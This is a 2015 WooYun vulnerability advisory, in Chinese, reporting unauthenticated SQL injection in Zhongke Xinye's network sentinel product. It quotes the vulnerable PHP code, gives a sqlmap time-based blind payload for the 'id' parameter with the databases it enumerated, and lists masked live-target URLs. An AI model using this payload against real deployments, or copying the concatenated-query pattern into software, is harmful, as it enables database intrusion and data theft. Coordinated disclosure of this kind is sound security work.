当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126992

漏洞标题:中科新业网络哨兵一处sql注入

相关厂商:中科新业

漏洞作者: 牛肉包子

提交时间:2015-07-17 18:27

修复时间:2015-10-15 16:24

公开时间:2015-10-15 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-17: 细节已通知厂商并且等待厂商处理中
2015-07-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-20: 细节向第三方安全合作伙伴开放
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

无需登录

详细说明:

注入#1
看到
admin/addswitchmanage.php

$act = $_REQUEST['act'];
if ( $act == "E" )
{
$sql = "SELECT id,switch_ip,switch_type,decode(pass_word,'pd@st#rd') as pass,switch_oid,port_num,description\r\n\t\t FROM tab_switch WHERE id = ".$_GET['id'];
$gDb->query( $sql );
$gDb->next_record( );
$id = $gDb->Record['id'];
$switch_ip = $gDb->Record['switch_ip'];
$switch_pass = $gDb->Record['pass'];
$port_num = $gDb->Record['port_num'];
$switch_des = $gDb->Record['description'];
$type1 = $gDb->Record['switch_type'];
$vlan = $vlan = str_replace( "|", "\r", $gDb->Record['switch_oid'] );
$gIpTemp = explode( ".", $switch_ip );
$ip1 = $gIpTemp[0];
$ip2 = $gIpTemp[1];
$ip3 = $gIpTemp[2];
$ip4 = $gIpTemp[3];
}


注入#2
ucenter/unit/unitinfolang_a.php

if ( !isset( $_GET['type'] ) )
{
$type = 1;
}
else
{
$type = $_GET['type'];
}
$sql = "SELECT * FROM tab_lang_type WHERE id=".$type;
$gDb2->query( $sql );
$gRnum = $gDb2->num_rows( );
$gDb2->next_record( );
$gid = $_GET['unit_id'];
$iI = 0;
for ( ; $iI < $gRecordCnt; ++$iI )
{
$gDb->next_record( );
if ( $gDb->Record['id'] == $gDb2->Record['id'] )
{
$color = "style='color:#FF0000'";
}
else
{
$color = "";
}
$lang_type .= "<a href='../main/zkxy.php?gProgramId=unitinfolang&gModuleId=unit&CommonFlag=A&type=".$gDb->Record['id']."&unit_id={gid}'".$color.">".$gDb->Record['type']."</a> ";
}


明显的注入

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: act=E&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ToKi)
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [9]:
[*] `#mysql50#ucenter_08-12-26-17-21-57OURCE`
[*] cluster
[*] information_schema
[*] mysql
[*] ucenter
[*] ucenter_big_tables
[*] ucenter_gbk_bak
[*] ucenter_org
[*] ucenter_other_tables


案例

**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1
**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1
**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1
**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1
**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1

修复方案:

0.0

版权声明:转载请注明来源 牛肉包子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-17 16:22

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无


漏洞评价:

评论